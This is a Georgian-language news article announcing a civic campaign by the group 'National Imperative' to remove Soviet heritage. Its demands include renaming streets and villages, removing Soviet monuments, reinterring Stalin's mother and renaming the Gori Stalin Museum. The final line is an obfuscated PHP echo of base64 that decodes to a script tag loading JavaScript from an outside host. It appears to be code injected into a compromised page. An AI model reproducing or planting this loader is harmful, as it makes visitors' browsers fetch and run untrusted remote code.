celsiusi
ავერსი შნაიდერი
ხვალ , 12 აპრილს, 14:00 საათზე მთავრობის კანცელარიის წინ საინფორმაციო ბრიფინგი-აქცია სამოქალაქო კამპანია - „დაასრულე საბჭოთა მემკვიდრეობა - გადაიაზრე ისტორია“ გაიმართება. აქცია, დამოუკიდებლობის აღდგენის 30 წლისთავთან დაკავშირებით დაიგეგმა.
 
როგორც საინფორმაციო სააგენტო BUSINESS TIME-ს აქციის ორგანიზატორებმა აცნობეს, ინიციატივის წარმდგენია საზოგადოებრივი გაერთიანება „ეროვნული იმპერატივი“.
 
მათივე ცნობით, აქციის მიზანია საბჭოთა წარსულის და მისი მემკვიდრეობის ეროვნულ-სახელწმიფოებრივი და დასავლური ღირებულებების შესაბამისად გადააზრება. პრორუსული და საბჭოთა ნარატივის დესტრუქციულობის და ანტისახელმწიფოებრივი მიდგომის საჯარო დეკლარირება და პრორუსული ე.წ. „რბილი ძალის“ მიერ საბჭოთა ნოსტალგიის მილევად რეჟიმში გადაყვანა. საჯარო სივრცეების გაწმენდა საბჭოთა რეჟიმთან დაკავშირებული ვიზუალური მემკვიდრეობის ნიმუშებისაგან და საბჭოთა ანტიეროვნული, ანტისახელწმიფოებრივი და ანტიდასავლური „მითების“ აღმოფხვრა. ამ მიზნის მისაღწევად, სამოქალაქო კამპანია დაიწყება, სიმბოლურად დამოუკდიებლობის აღდგენის 30 წლისთავზე (რადგან სამწუხაროდ აქამდე ეს სრულფასოვნად ვერ/არ მოხერხდა).
 
“ ამ ამ მიზნის მისაღწევად, ხელისუფლების სხვადასხვა შტოებს მივმართავთ ხუთი მთავარი მოთხოვნით: საქართველოს მასშტაბით, ყველა დაბასა და სოფელს, რომელსაც შერჩენილი აქვს საბჭოთა რეჟიმის ფუნქციონერთა ან საბჭოთა კონოტაციის შემცველი დასახელებები, ასევე ნებისმიერ დასახლებულ პუნქტში, ჯერ კიდევ არსებულ, საბჭოთა ბელადებისა თუ ფუნქციონერების სახელების მქონე ქუჩებს - გადაერქვას დასახელება, მიმდინარე წლის ბოლომდე; საქართველოს მასშტაბით, ნებისმიერ დასახლებულ პუნქტში თუ სხვა საჯარო სივრცეში, ჯერ კიდევ შემორჩენილი, საბჭოთა ბელადებისა თუ სხვა ფუნქციონერების სკულპტურების, სკულპტურული კომპოზიციების, ბიუსტებისა თუ მემორიალებისაგან გაიწმინდოს საჯარო სივრცეები, წლის ბოლომდე („თავისუფლების ქარტიის“ ვალდებულებების შესაბამისად); მთაწმინდის მწერალთა და საზოაგადო მოღვაწეთა პანთეონიდან გადასვენებულ იქნას სტალინის დედის ნეშტი, წლის ბოლომდე; გორში სტალინის მუზეუმს, წლის ბოლომდე გადაერქვას დასახელება და ეწოდოს „საბჭოთა ტოტალიტარიზმის მუზეუმი“ (ან „საქართველოს ოკუპაციის მუზეუმი გორში“ და დაექვემდებაროს საქართველოს ეროვნული მუზეუმის შემადგენლობაში მყოფ „ოკუპაციის მუზეუმს“). შესაბამისი, კონცეფციის მიხედვით მოხდეს რეექსპოზირება და ექსკურსიების შინაარსის კორექტირება; წლის ბოლომდე დაიწყოს მოსამზადებელი სამუშაოები და კონცეფციის შემუშავება საქართველოში რუსული იმპერიალიზმისა და საბჭოთა ტოტალიტარიზმის მიერ რელიგიური ჩაგვრისა და შევიწროების მუზეუმის შესაქმნელად. ამისათვის, სამთავრობო, რელიგიური და საზოაგადოებრივი ორგანიზაციების ჩართულობით შედგეს სამუშაო ჯგუფი, რომელიც შეიმუშავებს კონცეფციას, მუზეუმის განთავსების ლოკაციაზე მიიღებს გადაწყვეტილებას და მოამზადებს მეცნიერულად დაზუსტებულ შინაარსობრივ მასალას, რის მიხედვითაც დაიყება არტეფაქტების, ექსპონატების და ა.შ. მობილიზება.”- ნათქვამია ორგანიზატორების მიერ გავრცელებულ ინფორმაციაში.
 
კამპანიის ფარგლებში, ასევე დაიწყება მუშაობა თანამოაზრეთა წრის გაფართოებაზე, შეგროვდება თანხმობის წერლები საქართველოში მოქმედი ორგანიზაციების და სამოქალაქო პირების მხრიდან და შემუშავდება ჩართულობის/თანამშრომლობის პაკეტი.
 
 
 
 
1300
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");